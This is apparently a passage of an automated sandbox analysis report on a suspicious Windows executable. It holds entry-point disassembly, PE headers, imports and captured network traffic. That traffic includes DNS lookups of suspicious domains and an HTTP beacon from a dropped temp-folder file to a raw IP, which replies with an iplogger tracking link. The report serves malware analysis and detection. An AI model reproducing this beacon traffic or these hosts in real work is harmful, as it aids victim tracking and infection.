                                                                                                              jmp 00007FF0987CD51Dh
                                                                                                              cmp ecx, dword ptr [00431558h]
                                                                                                              jne 00007FF0987CD695h
                                                                                                              ret
                                                                                                              jmp 00007FF0987CDD5Eh
                                                                                                              jmp 00007FF0987D20B3h
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              and dword ptr [00465380h], 00000000h
                                                                                                              sub esp, 28h
                                                                                                              push ebx
                                                                                                              xor ebx, ebx
                                                                                                              inc ebx
                                                                                                              or dword ptr [0043155Ch], ebx
                                                                                                              push 0000000Ah
                                                                                                              call 00007FF0987E0223h
                                                                                                              test eax, eax
                                                                                                              je 00007FF0987CD803h
                                                                                                              and dword ptr [ebp-10h], 00000000h
                                                                                                              xor eax, eax
                                                                                                              or dword ptr [0043155Ch], 02h
                                                                                                              xor ecx, ecx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov dword ptr [00465380h], ebx
                                                                                                              lea edi, dword ptr [ebp-28h]
                                                                                                              push ebx
                                                                                                              cpuid
                                                                                                              mov esi, ebx
                                                                                                              pop ebx
                                                                                                              mov dword ptr [edi], eax
                                                                                                              mov dword ptr [edi+04h], esi
                                                                                                              mov dword ptr [edi+08h], ecx
                                                                                                              mov dword ptr [edi+0Ch], edx
                                                                                                              mov eax, dword ptr [ebp-28h]
                                                                                                              mov ecx, dword ptr [ebp-1Ch]
                                                                                                              mov dword ptr [ebp-08h], eax
                                                                                                              xor ecx, 49656E69h
                                                                                                              mov eax, dword ptr [ebp-20h]
                                                                                                              xor eax, 6C65746Eh
                                                                                                              or ecx, eax
                                                                                                              mov eax, dword ptr [ebp-24h]
                                                                                                              push 00000001h
                                                                                                              xor eax, 756E6547h
                                                                                                              or ecx, eax
                                                                                                              pop eax
                                                                                                              push 00000000h
                                                                                                              pop ecx
                                                                                                              push ebx
                                                                                                              cpuid
                                                                                                              mov esi, ebx
                                                                                                              pop ebx
                                                                                                              mov dword ptr [edi], eax
                                                                                                              mov dword ptr [edi+04h], esi
                                                                                                              mov dword ptr [edi+08h], ecx
                                                                                                              mov dword ptr [edi+0Ch], edx
                                                                                                              jne 00007FF0987CD6D5h
                                                                                                              mov eax, dword ptr [ebp-28h]
                                                                                                              and eax, 0FFF3FF0h
                                                                                                              cmp eax, 000106C0h
                                                                                                              je 00007FF0987CD6B5h
                                                                                                              cmp eax, 00020660h
                                                                                                              je 00007FF0987CD6AEh
                                                                                                              cmp eax, 00020670h

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [EXP] VS2015 UPD3.1 build 24215
                                                                                                              • [LNK] VS2015 UPD3.1 build 24215
                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                              • [C++] VS2015 UPD3.1 build 24215
                                                                                                              • [RES] VS2015 UPD3 build 24213

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x2ffa00x34.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2ffd40x3c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000xdfd0.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x750000x27ec.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2e8100x54.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x292380x40.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x270000x220.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2f6940x100.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x25f0a0x26000False0.577264083059data6.69284076721IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x270000x9c140x9e00False0.453075553797data5.20986268254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x310000x34d900xe00False0.377790178571data3.79528519664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .didat0x660000x15c0x200False0.408203125data2.99773455687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x670000xdfd00xe000False0.637050083705data6.63698184983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x750000x27ec0x2800False0.8044921875data6.7259837024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              PNG0x676500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                                                                                                              PNG0x681980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                                                                                                              RT_ICON0x697480x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                              RT_ICON0x69cb00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                              RT_ICON0x6a5580xea8dataEnglishUnited States
                                                                                                              RT_ICON0x6b4000x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                              RT_ICON0x6b8680x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                              RT_ICON0x6c9100x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                              RT_ICON0x6eeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                              RT_DIALOG0x735880x286dataEnglishUnited States
                                                                                                              RT_DIALOG0x733580x13adataEnglishUnited States
                                                                                                              RT_DIALOG0x734980xecdataEnglishUnited States
                                                                                                              RT_DIALOG0x732280x12edataEnglishUnited States
                                                                                                              RT_DIALOG0x72ef00x338dataEnglishUnited States
                                                                                                              RT_DIALOG0x72c980x252dataEnglishUnited States
                                                                                                              RT_STRING0x73f680x1e2dataEnglishUnited States
                                                                                                              RT_STRING0x741500x1ccdataEnglishUnited States
                                                                                                              RT_STRING0x743200x1b8dataEnglishUnited States
                                                                                                              RT_STRING0x744d80x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
                                                                                                              RT_STRING0x746200x446dataEnglishUnited States
                                                                                                              RT_STRING0x74a680x166dataEnglishUnited States
                                                                                                              RT_STRING0x74bd00x152dataEnglishUnited States
                                                                                                              RT_STRING0x74d280x10adataEnglishUnited States
                                                                                                              RT_STRING0x74e380xbcdataEnglishUnited States
                                                                                                              RT_STRING0x74ef80xd6dataEnglishUnited States
                                                                                                              RT_GROUP_ICON0x72c300x68dataEnglishUnited States
                                                                                                              RT_MANIFEST0x738100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                                              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 28, 2020 15:07:10.123815060 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.383060932 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.383348942 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.385420084 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.643752098 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.647347927 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.690886974 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.825555086 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:10.847800016 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.847906113 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:10.852497101 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:10.874772072 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876108885 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876132965 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876152992 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876172066 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876313925 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:10.989924908 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:11.013079882 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:11.050437927 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:11.081525087 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:11.081581116 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:11.081764936 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:11.213141918 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:11.235768080 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:11.237801075 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:15.647485018 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:15.649553061 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:15.657855988 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:15.916197062 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.017199039 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.039550066 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.039808035 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.042964935 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.065248013 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.067945957 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.067984104 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.068008900 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.068033934 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.068073034 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.068104982 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.082701921 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.106343985 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.106636047 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.109718084 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.141027927 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.141211033 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:35.965049028 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:35.992804050 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:35.992925882 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:36.034851074 CET49737443192.168.2.588.99.66.31

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 28, 2020 15:05:07.095318079 CET6318353192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:07.133047104 CET53631838.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:08.119956970 CET6015153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:08.147207022 CET53601518.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:09.232023001 CET5696953192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:09.259229898 CET53569698.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:10.403655052 CET5516153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:10.430695057 CET53551618.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:11.601398945 CET5475753192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:11.628647089 CET53547578.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:24.353724003 CET4999253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:24.391411066 CET53499928.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:30.798348904 CET6007553192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:30.836570024 CET53600758.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:32.873336077 CET5501653192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:32.900485992 CET53550168.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:36.056870937 CET6434553192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:36.083870888 CET53643458.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:55.802947998 CET5712853192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:55.854155064 CET53571288.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:57.190603018 CET5479153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:57.227457047 CET53547918.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:06:01.406568050 CET5046353192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:06:01.449820995 CET53504638.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:06:02.737278938 CET5039453192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:06:02.774029970 CET53503948.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:06:34.033473015 CET5853053192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:06:34.060530901 CET53585308.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.783339977 CET5381353192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:10.818804026 CET53538138.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:21.704451084 CET6373253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:21.745177984 CET53637328.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:23.718533993 CET5734453192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:23.745588064 CET53573448.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:26.942025900 CET5445053192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:27.013183117 CET53544508.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.148013115 CET5926153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:27.195842981 CET53592618.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:28.849608898 CET5715153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:28.885410070 CET53571518.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:33.152123928 CET5941353192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:33.153711081 CET6051653192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:33.187537909 CET53594138.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:33.189069033 CET53605168.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:33.945458889 CET5164953192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:33.981333017 CET53516498.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:34.729815006 CET6508653192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:34.852657080 CET53650868.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:35.556140900 CET5643253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:35.591646910 CET53564328.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:36.369559050 CET5292953192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET53529298.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:37.115530014 CET6431753192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:37.142649889 CET53643178.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:38.323499918 CET6237253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET53623728.8.8.8192.168.2.5

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Nov 28, 2020 15:06:01.406568050 CET192.168.2.58.8.8.80xc97bStandard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:10.783339977 CET192.168.2.58.8.8.80x7e08Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:21.704451084 CET192.168.2.58.8.8.80x301bStandard query (0)7553014bd6a4211b.xyzA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:26.942025900 CET192.168.2.58.8.8.80x43f1Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:27.148013115 CET192.168.2.58.8.8.80xff88Standard query (0)www.evograph.roA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:28.849608898 CET192.168.2.58.8.8.80x8e02Standard query (0)www.evograph.roA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.152123928 CET192.168.2.58.8.8.80x7481Standard query (0)7553014bd6a4211b.xyzA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.153711081 CET192.168.2.58.8.8.80x504Standard query (0)7553014bd6a4211b.xyzA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:34.729815006 CET192.168.2.58.8.8.80x686Standard query (0)trueaerned.comA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:36.369559050 CET192.168.2.58.8.8.80x7f6bStandard query (0)jojo-soft.xyzA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:37.115530014 CET192.168.2.58.8.8.80x4ceaStandard query (0)ip-api.comA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:38.323499918 CET192.168.2.58.8.8.80x75f3Standard query (0)p421ls.xyzA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Nov 28, 2020 15:06:01.449820995 CET8.8.8.8192.168.2.50xc97bNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:10.818804026 CET8.8.8.8192.168.2.50x7e08No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:21.745177984 CET8.8.8.8192.168.2.50x301bNo error (0)7553014bd6a4211b.xyz172.67.157.133A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:21.745177984 CET8.8.8.8192.168.2.50x301bNo error (0)7553014bd6a4211b.xyz104.24.114.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:21.745177984 CET8.8.8.8192.168.2.50x301bNo error (0)7553014bd6a4211b.xyz104.24.115.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:27.013183117 CET8.8.8.8192.168.2.50x43f1No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:27.195842981 CET8.8.8.8192.168.2.50xff88No error (0)www.evograph.roevograph.roCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:27.195842981 CET8.8.8.8192.168.2.50xff88No error (0)evograph.ro89.40.17.17A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:28.885410070 CET8.8.8.8192.168.2.50x8e02No error (0)www.evograph.roevograph.roCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:28.885410070 CET8.8.8.8192.168.2.50x8e02No error (0)evograph.ro89.40.17.17A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.187537909 CET8.8.8.8192.168.2.50x7481No error (0)7553014bd6a4211b.xyz172.67.157.133A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.187537909 CET8.8.8.8192.168.2.50x7481No error (0)7553014bd6a4211b.xyz104.24.114.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.187537909 CET8.8.8.8192.168.2.50x7481No error (0)7553014bd6a4211b.xyz104.24.115.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.189069033 CET8.8.8.8192.168.2.50x504No error (0)7553014bd6a4211b.xyz172.67.157.133A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.189069033 CET8.8.8.8192.168.2.50x504No error (0)7553014bd6a4211b.xyz104.24.114.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.189069033 CET8.8.8.8192.168.2.50x504No error (0)7553014bd6a4211b.xyz104.24.115.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:34.852657080 CET8.8.8.8192.168.2.50x686No error (0)trueaerned.com198.98.57.54A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET8.8.8.8192.168.2.50x7f6bNo error (0)jojo-soft.xyz104.31.72.130A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET8.8.8.8192.168.2.50x7f6bNo error (0)jojo-soft.xyz104.31.73.130A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET8.8.8.8192.168.2.50x7f6bNo error (0)jojo-soft.xyz172.67.194.188A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:37.142649889 CET8.8.8.8192.168.2.50x4ceaNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET8.8.8.8192.168.2.50x75f3No error (0)p421ls.xyz104.31.90.245A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET8.8.8.8192.168.2.50x75f3No error (0)p421ls.xyz104.31.91.245A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET8.8.8.8192.168.2.50x75f3No error (0)p421ls.xyz172.67.160.131A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • https:
                                                                                                                • 101.36.107.74

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.549732101.36.107.7480C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 28, 2020 15:07:10.385420084 CET4381OUTGET /seemorebty/il.php?e=jg2_2qua HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              Referer: https://www.facebook.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                                                                                                              Host: 101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.647347927 CET4381INHTTP/1.1 200 OK
                                                                                                              Date: Sat, 28 Nov 2020 14:07:10 GMT
                                                                                                              Server: Apache/2.4.37 (centos)
                                                                                                              X-Powered-By: PHP/7.2.24
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 31 61 0d 0a 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 5a 64 6e 59 37 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1ahttps://iplogger.org/ZdnY70


                                                                                                              HTTPS Packets

                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                              Nov 28, 2020 15:07:10.876172066 CET88.99.66.31443192.168.2.549733CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
